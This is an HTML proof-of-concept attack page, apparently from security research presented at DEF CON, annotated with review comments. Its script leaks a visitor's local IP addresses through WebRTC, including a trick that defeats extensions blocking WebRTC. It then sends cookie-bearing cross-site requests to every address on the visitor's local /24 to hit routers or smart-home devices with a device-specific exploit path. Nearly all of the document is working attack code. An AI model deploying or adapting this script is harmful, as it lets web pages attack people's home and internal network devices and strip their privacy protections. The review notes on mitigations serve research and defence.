- <HTML><TITLE>Smart CSRF PoC</TITLE>
- <!--
- The MIT License (MIT)
- Copyright (c) 2015 Daniel Roesler
- Permission is hereby granted, free of charge, to any person obtaining a copy
- of this software and associated documentation files (the "Software"), to deal
- in the Software without restriction, including without limitation the rights
- to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- copies of the Software, and to permit persons to whom the Software is
- furnished to do so, subject to the following conditions:
- The above copyright notice and this permission notice shall be included in all
- copies or substantial portions of the Software.
- THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
- SOFTWARE.
- -->
- <script>
- // Linkback: http://www.tripwire.com/state-of-security/off-topic/smart-csrf/
- // This code is derived from a PoC I came across on GitHub: https://github.com/diafygi/webrtc-ips/blob/master/README.md
- // I have only slightly modified it to assume the IP is on a /24 and iterate over the addresses with an HTTP request.
- // A version of this script including the payload for a 0-day in a home automation product was demonstrated at:
- // DEF CON 23 IoT Village and InfoSec Europe 2015 Intelligent Defence in a talk titled 'Smart Home Invasion'
- // Interestingly enough, this code worked in Chrome even without an Internet connection to reach the STUN server.
- // That is expected: the private address comes from the host candidates, which are gathered from the local interfaces; the STUN server is only needed for the server-reflexive (public) candidate.
- // -- Craig Young, Security Researcher Tripwire VERT
- //gather the IP addresses the browser exposes through WebRTC ICE candidates (local interfaces, plus the public address via STUN)
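// Gather the IP addresses the browser exposes through WebRTC ICE candidates.
//
// Every distinct IPv4 literal found in a candidate is passed to `callback`
// exactly once, as a string. Candidates are read from two places: the
// onicecandidate event as gathering runs, and, one second later, the
// a=candidate: lines of the local SDP. Host candidates are produced from the
// local interfaces, so the STUN server is only involved for the
// server-reflexive (public) address.
//
// NOTE(review): the peer connection is never closed, so on a long-lived page
// it and its listener stay alive until navigation.
// NOTE(review): current browsers tend to hide host-candidate IPs behind mDNS
// ".local" names unless a media permission has been granted; on such a
// browser this only yields the public address — confirm against the target.
function getIPs(callback){
  var ip_dups = {};
  //compatibility for firefox and chrome (vendor-prefixed constructors)
  var RTCPeerConnection = window.RTCPeerConnection
    || window.mozRTCPeerConnection
    || window.webkitRTCPeerConnection;
  var useWebKit = !!window.webkitRTCPeerConnection;
  //bypass naive webrtc blocking (an extension deleting the constructor on the
  //top window) by borrowing it from a same-origin iframe's window
  if(!RTCPeerConnection){
    //NOTE: you need to have an iframe in the page right above the script tag
    //
    //<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
    //<script>...getIPs called in here...
    //
    var win = iframe.contentWindow;
    RTCPeerConnection = win.RTCPeerConnection
      || win.mozRTCPeerConnection
      || win.webkitRTCPeerConnection;
    useWebKit = !!win.webkitRTCPeerConnection;
  }
  if(!RTCPeerConnection){
    //fail with a readable message instead of "undefined is not a constructor"
    throw new Error('getIPs: no RTCPeerConnection constructor available');
  }
  //minimal requirements for data connection
  var mediaConstraints = {
    optional: [{RtpDataChannels: true}]
  };
  //firefox already has a default stun server in about:config
  // media.peerconnection.default_iceservers =
  // [{"url": "stun:stun.services.mozilla.com"}]
  var servers = undefined;
  //add same stun server for chrome; this is the only outbound request the
  //function makes
  if(useWebKit)
    servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
  //construct a new RTCPeerConnection
  var pc = new RTCPeerConnection(servers, mediaConstraints);
  //extract the first IPv4 literal from a candidate string and report it once
  function handleCandidate(candidate){
    //match just the IP address
    var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
    var match = ip_regex.exec(candidate);
    //IPv6 candidates and mDNS (".local") host candidates carry no IPv4
    //literal; indexing the null match would throw a TypeError and abort the
    //whole event handler, so skip them instead
    if(!match)
      return;
    var ip_addr = match[1];
    //remove duplicates (the same address shows up in the event and in the SDP)
    if(ip_dups[ip_addr] === undefined)
      callback(ip_addr);
    ip_dups[ip_addr] = true;
  }
  //listen for candidate events
  pc.onicecandidate = function(ice){
    //skip the end-of-gathering event, which has no candidate
    if(ice.candidate)
      handleCandidate(ice.candidate.candidate);
  };
  //create a bogus data channel so the offer has something to negotiate
  pc.createDataChannel("");
  //create an offer sdp (legacy callback form, kept for the prefixed APIs)
  pc.createOffer(function(result){
    //setting the local description is what starts ICE gathering
    pc.setLocalDescription(result, function(){}, function(){});
  }, function(){});
  //wait a while, then sweep the local description for anything the event
  //path missed
  setTimeout(function(){
    //createOffer/setLocalDescription are asynchronous; if they have not
    //completed (or failed) there is no description to read yet
    var desc = pc.localDescription;
    if(!desc || !desc.sdp)
      return;
    desc.sdp.split('\n').forEach(function(line){
      if(line.indexOf('a=candidate:') === 0)
        handleCandidate(line);
    });
  }, 1000);
}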
// Entry point: once a private-looking address has been harvested, sweep the
// assumed /24 around it with one unauthenticated GET per host. The browser
// attaches whatever cookies it holds for each target to the cross-origin
// request, which is the "smart CSRF" the title refers to.
// `exploit_URI_payload` (the device-specific path) is not defined anywhere in
// this file, so as pasted the loop throws a ReferenceError on its first pass.
//
// NOTE(review): the prefix regex is unanchored, so an address such as
// "110.1.2.3" also matches ("10.1.2."); and the 172.16 branch keeps only two
// octets, so the loop then requests http://172.16.<node> — presumably parsed
// as 172.16.0.<node>, not the host's own /24 — and covers only 172.16/16 of
// the 172.16/12 block. `node` is also an implicit global (no var).
// NOTE(review): browsers have since added mitigations that blunt this
// (SameSite-by-default cookies, private-network-access restrictions on
// public-to-private requests); LAN devices should still not change state on
// a cookie-authenticated GET and should require a CSRF token.
getIPs(
  function(ip){
    var local_regex = /10\.[0-9]+\.[0-9]+\.|192\.168\.[0-9]+\.|172\.16\./
    if (local_regex.exec(ip) != null) {
      //the matched text is the prefix of the assumed /24 (e.g. "192.168.1.")
      var subnet = local_regex.exec(ip)[0];
      for (node=1; node<256; node++) {
        //fire-and-forget: the response is opaque cross-origin, but the
        //request (and any side effect it has on the device) still happens
        var url = 'http://' + subnet + node + exploit_URI_payload;
        var oReq = new XMLHttpRequest();
        oReq.open("get",url,true)
        oReq.send();
      }
    }
  }
);
- </script>
- <H1>o0o0o0o0o0o0</H1>
- </HTML>